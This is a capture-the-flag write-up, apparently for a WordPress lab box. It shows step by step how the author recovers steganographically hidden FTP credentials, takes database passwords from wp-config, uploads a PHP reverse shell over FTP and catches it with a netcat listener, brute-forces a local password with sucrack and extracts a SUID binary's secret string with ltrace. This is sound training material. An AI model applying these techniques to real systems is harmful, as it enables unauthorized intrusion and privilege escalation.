Different CTF


NMAP RESULTS:

Nmap scan report for 10.10.58.197
Host is up, received syn-ack (0.19s latency).
Scanned at 2021-04-16 23:11:30 EDT for 12s

PORT   STATE SERVICE REASON  VERSION
21/tcp open  ftp     syn-ack vsftpd 3.0.3
80/tcp open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: WordPress 5.6
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Hello World &#8211; Just another WordPress site
Service Info: OS: Unix


after navigating to the webpage, i found a potential domain name of the website which i add in the /etc/hosts file
now i got to know that this is a wordpress site, using wpscan i got to know about a potential user:

[i] User(s) Identified:

[+] hakanbey01
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://adana.thm/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)



GOBUSTER SCANS:

===============================================================
2021/04/16 23:15:05 Starting gobuster
===============================================================
/wp-content (Status: 301)
/wp-login.php (Status: 200)
/announcements (Status: 301)
/wp-includes (Status: 301)
/javascript (Status: 301)
/wp-trackback.php (Status: 200)
/wp-admin (Status: 301)
/phpmyadmin (Status: 301)
/wp-signup.php (Status: 302)

I FOUND A DIRECTORY NAMED 'announcements'
AFTER NAVIGATING THROUGH IT, I FOUND A JPEG IMAGE AND A WORDLIST, THE FIRST THING CLICKED IN MY MIND IS STEGANOGRAPHY
I USE STEGSEEK TO CRACK THE PASSPHRASE:

======================================================
┌──(kali㉿kali)-[~/different]
└─$ stegseek --crack austrailian-bulldog-ant.jpg wordlist.txt out.txt                    
StegSeek version 0.5
Progress: 95.15% (384297 bytes)           

[i] --> Found passphrase: "123adanaantinwar"
[i] Original filename: "user-pass-ftp.txt"
[i] Extracting to "out.txt"

THIS IS BASE64 ENCODING:

┌──(kali㉿kali)-[~/different]
└─$ cat out.txt                          
RlRQLUxPR0lOClVTRVI6IGhha2FuZnRwClBBU1M6IDEyM2FkYW5hY3JhY2s=
                                                                                                                                                                        

┌──(kali㉿kali)-[~/different]
└─$ cat out.txt| base64-d                                                                                    1 ⨯
FTP-LOGIN
USER: hakanftp
PASS: 123adanacrack                                                                                                                                                                        

GOT THE FTP CREDS!!

=============================================
┌──(kali㉿kali)-[~/different]
└─$ ftp 10.10.58.197    
Connected to 10.10.58.197.
220 (vsFTPd 3.0.3)
Name (10.10.58.197:kali): hakanftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Jan 14 16:49 announcements
-rw-r--r--    1 1001     1001          405 Feb 06  2020 index.php
-rw-r--r--    1 1001     1001        19915 Feb 12  2020 license.txt
-rw-r--r--    1 1001     1001         7278 Jun 26  2020 readme.html
-rw-r--r--    1 1001     1001         7101 Jul 28  2020 wp-activate.php
drwxr-xr-x    9 1001     1001         4096 Dec 08 22:13 wp-admin
-rw-r--r--    1 1001     1001          351 Feb 06  2020 wp-blog-header.php
-rw-r--r--    1 1001     1001         2328 Oct 08  2020 wp-comments-post.php
-rw-r--r--    1 0        0            3194 Jan 11 09:55 wp-config.php
drwxr-xr-x    4 1001     1001         4096 Dec 08 22:13 wp-content
-rw-r--r--    1 1001     1001         3939 Jul 30  2020 wp-cron.php
drwxr-xr-x   25 1001     1001        12288 Dec 08 22:13 wp-includes
-rw-r--r--    1 1001     1001         2496 Feb 06  2020 wp-links-opml.php
-rw-r--r--    1 1001     1001         3300 Feb 06  2020 wp-load.php
-rw-r--r--    1 1001     1001        49831 Nov 09 10:53 wp-login.php
-rw-r--r--    1 1001     1001         8509 Apr 14  2020 wp-mail.php
-rw-r--r--    1 1001     1001        20975 Nov 12 14:43 wp-settings.php
-rw-r--r--    1 1001     1001        31337 Sep 30  2020 wp-signup.php
-rw-r--r--    1 1001     1001         4747 Oct 08  2020 wp-trackback.php
-rw-r--r--    1 1001     1001         3236 Jun 08  2020 xmlrpc.php
226 Directory send OK.
ftp> 
========================================================

THIS FTP DIRECTORY IS NOTHING BUT THE WORDPRESS SOURCE CODE


AFTER CHECKING THE WP-CONFIG FILE I FOUND THE DATABASE CREDENTIALS:
=================================================
define( 'DB_NAME', 'phpmyadmin1' );

/** MySQL database username */
define( 'DB_USER', 'phpmyadmin' );

/** MySQL database password */
define( 'DB_PASSWORD', '12345' );

IN THE DATABASE 'phpmyadmin'; TABLE:'wp-users', I FOUND THE CREDS 

hakanbey01:$P$BQML2QxAFBH4hb.qqKTpDnta6Q6Wl2/ 	

SO I EDITED THE PASSWORD WITH MY OWN, AND THEN TRY TO LOGIN TO THE WORDPRESS

┌──(kali㉿kali)-[~/different]
└─$ openssl passwd -6 ishu                                                      
$6$igDKRDn3D9utVQ/1$4worZBB7hwuNXRiSVeqOSOSjBt.tXMACixy8GNdIi6jI.Psgw3VrWtH/G2p7wjhTCen/xmQ1YxKShJNzM9qPK1


YES!!
ACCESS GRANTED

BUT IM NOT ABLE TO EDIT THE PHP FILES ON THE WORDPRESS SERVER AS I DON'T HAVE PERMISSIONS

SO MAYBE THIS ALL IS A RABBIT HOLE
THERE IS ALSO A DATABASE NAME 'phpmyadmin1', I CHECK EACH AND EVERY TABLE OF THIS DATABASE:
IN THE 'wp-options' TABLE, I FOUND A SUBDOMAIN:
=====================================
http://subdomain.adana.thm

ADD THIS TO THE /etc/hosts FILE
I THINK THE FTP SERVER IS CONNECTED TO THIS NEW WORDPRESS SITE
SO WE CAN EDIT THE FILES USING THE FTP SERVER AND GET CODE EXECUTION ON THE SERVER

SO I PUT THE REVERSE SHELL PHP CODE AND THEN CHANGE ITS PERMISSION TO 777
=======================================
226 Directory send OK.
ftp> put rev.php 
local: rev.php remote: rev.php
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
5501 bytes sent in 0.02 secs (296.2593 kB/s)
ftp> chmod 777 rev.php 
200 SITE CHMOD command ok.
ftp> 


LETS CREATE A LISTENER AND EXECUTE THE PAYLOAD
SO NAVIGATING TO rev.php ON THAT SUBDOMAIN:

WE GET OUR SHELL:
================================
┌──(kali㉿kali)-[~/different]
└─$ nc -nvlp 1234
listening on [any] 1234 ...
connect to [10.8.73.218] from (UNKNOWN) [10.10.12.20] 53766
Linux ubuntu 4.15.0-130-generic #134-Ubuntu SMP Tue Jan 5 20:46:26 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
 03:18:15 up 13 min,  0 users,  load average: 0.01, 0.04, 0.06
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 


LETS STABILIZE IT FIRST
GOT THE WEB FLAG


NOW I GOT STUCK
THEN SPENDING SOME TIME (OR WASTING), I NOTICE THE PASSWORDS WE GET EARLIER
WE CAN SEE THAT THESE PASSWORD HAS SOMETHING SIMILAR,THEY CONTAIN '123adana' AT THE STARTING OF IT

AS WE GOT A WORDLIST FROM THE SERVER EARLIER, I APPEND '123adana' TO ALL THE WORDS IN IT:
┌──(kali㉿kali)-[~/different]
└─$ sed s/^/123adana/g wordlist.txt > append.wordlist

THEN I UPLOAD THE WORDLIST TO THE REMOTE MACHINE AND A TOOL NAME SUCRACK WHICH HELPS US BRUTEFORCING THE PASSWORD FOR A USER ON THE SYSTEM

www-data@ubuntu:/tmp$ ./sucrack -u hakanbey -w 100 append.wordlist 
password is: 123adanasubaru
www-data@ubuntu:/tmp$ 

YES I GOT THE USER PASSWORD!!!

GOT THE USER PASSWORD

NOW I SEARCH FOR SUID BINARY:
/usr/bin/binary

THIS ONE SEEMS ODD

LETS CHECK IT
=====================
hakanbey@ubuntu:~$ /usr/bin/binary 
I think you should enter the correct string here ==>4
pkill: killing pid 1818 failed: Operation not permitted
pkill: killing pid 10181 failed: Operation not permitted
www-data@ubuntu:/tmp$ 

IF THE INPUT IS WRONG THEN IT WILL DROP YOUR PRIVILEGES
I TRANSFER THE FILE TO MY LOCAL MACHINE AND LTRACE IT:
===============================================
┌──(kali㉿kali)-[~/different]
└─$ ltrace ./binary 
strcat("war", "zone")                                                                                   = "warzone"
strcat("warzone", "in")                                                                                 = "warzonein"
strcat("warzonein", "ada")                                                                              = "warzoneinada"
strcat("warzoneinada", "na")                                                                            = "warzoneinadana"
printf("I think you should enter the cor"...)                                                           = 52
__isoc99_scanf(0x559fc0000edd, 0x7ffc03095420, 0, 0I think you should enter the correct string here ==>warzoneinada
)                                                    = 1
strcmp("warzoneinada", "warzoneinadana")                                                                = -110
strcat("pki", "l")                                                                                      = "pkil"
strcat("pkil", "l")                                                                                     = "pkill"
strcat("pkill", " -9")                                                                                  = "pkill -9"
strcat("pkill -9", " -t")                                                                               = "pkill -9 -t"
strcat("pkill -9 -t", " pts")                                                                           = "pkill -9 -t pts"
strcat("pkill -9 -t pts", "/0")                                                                         = "pkill -9 -t pts/0"
system("pkill -9 -t pts/0" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                  = 256
+++ exited (status 0) +++

GOT THE PASSWORD!!
=============================================
hakanbey@ubuntu:~$ /usr/bin/binary 
I think you should enter the correct string here ==>warzoneinadana
Hint! : Hexeditor 00000020 ==> ???? ==> /home/hakanbey/Desktop/root.jpg (CyberChef)

Copy /root/root.jpg ==> /home/hakanbey/root.jpg
hakanbey@ubuntu:~$ 
============================================

A JPG FILE IS BEING COPIED TO THE DESKTOP FOLDER OF THE USER 
AND IT IS GIVING US HINT OF USING 'HEXEDITOR' AND 'CYBERCHEF'

LETS TRANSFER THE FILE (JPG) TO OUR LOCAL MACHINE

THIS HINT MEANS THAT TAKE THE 20 OFFSET FROM THE FILE USING THE HEXEDITOR AND THEN DECODE IT USING CYBERCHEF
FIRST FROM HEX THEN TO BASE85

root:Go0odJo0BbBro0o

GOT THE ROOT PASSWORD
GOT THE ROOT FLAG

